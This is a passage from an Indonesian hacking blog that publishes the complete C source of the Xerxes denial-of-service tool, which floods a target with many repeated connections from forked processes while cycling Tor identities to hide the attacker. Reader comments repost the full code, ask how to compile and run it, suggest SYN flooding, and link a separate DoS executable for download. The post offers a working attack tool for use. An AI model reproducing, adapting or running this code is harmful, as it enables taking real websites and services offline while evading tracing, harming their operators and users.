Home / Coding / DDOS Tools: Xerxes DOS Tools
black-hat-logo

DDOS Tools: Xerxes DOS Tools

Greeting Guest, Anonymous & BinusHacker Family

Berikut ini adalah source code Xerxes DOS (DDOS Tools) yang digunakan untuk melakukan DOS terhadap server-server. Digunakan oleh The Jester untuk takedown situs-situs, langsung aja ini source codenya:

/* XerXes – Most powerful dos tool – THN (http://pastebin.com/aWZMbjSU) */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int make_socket(char *host, char *port) {
    struct addrinfo hints, *servinfo, *p;
    int sock, r;
//    fprintf(stderr, “[Connecting -> %s:%s\n”, host, port);
    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
        fprintf(stderr, “getaddrinfo: %s\n”, gai_strerror(r));
        exit(0);
    }
    for(p = servinfo; p != NULL; p = p->ai_next) {
        if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
            continue;
        }
        if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
            close(sock);
            continue;
        }
        break;
    }
    if(p == NULL) {
        if(servinfo)
            freeaddrinfo(servinfo);
        fprintf(stderr, “No connection could be made\n”);
        exit(0);
    }
    if(servinfo)
        freeaddrinfo(servinfo);
    fprintf(stderr, “[Connected -> %s:%s]\n”, host, port);
    return sock;
}

void broke(int s) {
    // do nothing
}

#define CONNECTIONS 8
#define THREADS 48

void attack(char *host, char *port, int id) {
    int sockets[CONNECTIONS];
    int x, g=1, r;
    for(x=0; x!= CONNECTIONS; x++)
        sockets[x]=0;
    signal(SIGPIPE, &broke);
    while(1) {
        for(x=0; x != CONNECTIONS; x++) {
            if(sockets[x] == 0)
                sockets[x] = make_socket(host, port);
            r=write(sockets[x], “\0”, 1);
            if(r == -1) {
                close(sockets[x]);
                sockets[x] = make_socket(host, port);
            } else
//                fprintf(stderr, “Socket[%i->%i] -> %i\n”, x, sockets[x], r);
            fprintf(stderr, “[%i: Voly Sent]\n”, id);
        }
        fprintf(stderr, “[%i: Voly Sent]\n”, id);
        usleep(300000);
    }
}

void cycle_identity() {
    int r;
    int socket = make_socket(“localhost”, “9050”);
    write(socket, “AUTHENTICATE \”\”\n”, 16);
    while(1) {
        r=write(socket, “signal NEWNYM\n\x00”, 16);
        fprintf(stderr, “[%i: cycle_identity -> signal NEWNYM\n”, r);
        usleep(300000);
    }
}

int main(int argc, char **argv) {
    int x;
    if(argc !=3)
        cycle_identity();
    for(x=0; x != THREADS; x++) {
        if(fork())
            attack(argv[1], argv[2], x);
        usleep(200000);
    }
    getc(stdin);
    return 0;
}

Video Xerxes Dos

Semoga informasi ini bermanfaat sebagai pembelajaran yang lebih baik.

Ayo kunjungi Forum BinusHacker: http://forum.binushacker.net

About Artikel

Check Also

url-shortener-memperpendek-url-binushacker

Source Code URL Shortener 2 Versi – MiniUrlz

Halo kawan, ini postingan pertama saya di Binus Hacker, Disini saya akan share clone script …

32 comments

  1. Ini pake bahasa apa?

    trus cara exenya gmn??
    pake Terminal ato gmn??

  2. C:/deldos/8.8\q
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    int make_socket(char *host, char *port) {
    struct addrinfo hints, *servinfo, *p;
    int sock, r;
    // fprintf(stderr, “[Connecting -> %s:%s\n”, host, port);
    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
    fprintf(stderr, “getaddrinfo: %s\n”, gai_strerror(r));
    exit(0);
    }
    for(p = servinfo; p != NULL; p = p->ai_next) {
    if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
    continue;
    }
    if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
    close(sock);
    continue;
    }
    break;
    }
    if(p == NULL) {
    if(servinfo)
    freeaddrinfo(servinfo);
    fprintf(stderr, “No connection could be made\n”);
    exit(0);
    }
    if(servinfo)
    freeaddrinfo(servinfo);
    fprintf(stderr, “[Connected -> %s:%s]\n”, host, port);
    return sock;
    }
    void broke(int s) {
    // do nothing
    }
    #define CONNECTIONS 8
    #define THREADS 48
    void attack(char *host, char *port, int id) {
    int sockets[CONNECTIONS];
    int x, g=1, r;
    for(x=0; x!= CONNECTIONS; x++)
    sockets[x]=0;
    signal(SIGPIPE, &broke);
    while(1) {
    for(x=0; x != CONNECTIONS; x++) {
    if(sockets[x] == 0)
    sockets[x] = make_socket(host, port);
    r=write(sockets[x], “″, 1);
    if(r == -1) {
    close(sockets[x]);
    sockets[x] = make_socket(host, port);
    } else
    // fprintf(stderr, “Socket[%i->%i] -> %i\n”, x, sockets[x], r);
    fprintf(stderr, “[%i: Voly Sent]\n”, id);
    }
    fprintf(stderr, “[%i: Voly Sent]\n”, id);
    usleep(300000);
    }
    }
    void cycle_identity() {
    int r;
    int socket = make_socket(“localhost”, “9050″);
    write(socket, “AUTHENTICATE \”\”\n”, 16);
    while(1) {
    r=write(socket, “signal NEWNYM\n\x00″, 16);
    fprintf(stderr, “[%i: cycle_identity -> signal NEWNYM\n”, r);
    usleep(300000);
    }
    }
    int main(int argc, char **argv) {
    int x;
    if(argc !=3)
    cycle_identity();
    for(x=0; x != THREADS; x++) {
    if(fork())
    attack(argv[1], argv[2], x);
    usleep(200000);
    }
    getc(stdin);
    return 0;
    }

  3. nice info kang
    salam kenal..

  4. cara makenya gimana tuh gan ?

  5. gan , itu source codenya ntar di gimanain ? maklum ane masih newbie gan . mohon bimbingan 😀

  6. ada modul ttg DDOS gx ???

    lw ad Krim lwt Email ya???

    thx!!

  7. Email :

    Leo_leonardus@ymail.com

    kirim Ke E-Mail ini ya ???

  8. Kk , minta mentahannya langsung dong . bisa kan kk ?

  9. kalo ga salah ini bahasa C atau C++ ya?
    tinggal di compile aja ni gan…
    nanti hasilnya jadi “.exe”
    (sotoy) \(^_^)/

  10. kk minta yg langsung nya dong boleh ga kak ?

  11. ini terus di apain ? minta yg langsung nya dong kaks

  12. Seperti bahasa C++ ?

  13. mas… ini make bahasa c atau make bahasa c++ ????

  14. Kang….library ane kurang kang >_>
    error di Include2nya pada kaga nemu
    @_@
    kasi link nya dunk

  15. fungsinya buat apa ddos itu sendiri

  16. ---neXs34m5/[walied]

    DoS HTTP v1.0 by —neXs34m5/[walied] silakan download tool saya di
    http://www.ziddu.com/download/17623607/DoSHTTPv1.0.exe.html

  17. ---neXs34m5/[walied]

    apabila ada pertanyaan silakan kirim pesan di facebook bernama “walied ghali” gambarnya hitam putih

  18. ini pake bahasa c gan

  19. usahakan video tutornya bis di donlot kang ADMIN … ^_^

  20. xerxes tool yang dipake jester bisa buat windows?? kalo bisa gimana caranya gan 🙂

  21. sepertinya ini pake C++, maklum, masih baru belajar C++. Tinggal dikompile aja tuh source code

  22. gan pas udah saya compile..

    tulisannya “Source File not complete” ,terus gimana tuh ya ?

  23. jiahh,, ini mah si admin maen copas doang,, gak jelas gitu…
    dasar lamer

  24. ini gimana gan.. instal d linux.?? trus ini sc d apain..kok gk ada penjelasannya..kalo memang pake linux..mohon tutorial instal sama cara pake nya gan..

  25. mas, mas sekalian….mungkin bole saya bantu jelaskan dikit..ini pake bahasa C sederhana koq, cuma ya smua librarynya itu memang khusus untuk Unix…bias sih diganti untuk windows, hanya saja harus include winsock.h…cuma maenan socket saja…baru dilihat sekilas sih, buka koneksi TCP ke port yg diarah, kemudian kasih NULL aja terus-terusan…mungkin lebih powerful lagi kalau manfaatkan raw packet 🙂

  26. sekedar saran untuk mas mas, sebaiknya pelajari dulu tentang dunia socket sebelum mencoba untuk buat DDoS…sebenarnya buat DDos gampang koq…tinggal kasih Syn Sent sebanyak2anya…klo hajar ke database sih biasanya jebol juga karena nyangkut semua nanti packetnya gak bisa di close 🙂

  27. untuk semua orang yang membaca ini, ini bukan Xerxes, dia bisa menggantikan variabel dan soket URL sebagai link malware sendiri.

    link asli : http://www.lo0.ro/2011/xerxes-source-code-dos-tool-download/

  28. itu make script bahasa c&&c++, untuk file header kita harus buat dulu, jadi dalam script.a harus disisipin source code file header jika tidak, compiler devc++, minggw, visual c++, borland dsb gak akan bisa kompile….

  29. Yang mau mentahan di file DIATAS ping += 537ea4fe

  30. kk moon maff header nya apa yachh

    kok ngga ada biasanya kan pake cenio atau apalah starea,

Tinggalkan Balasan

Alamat surel Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *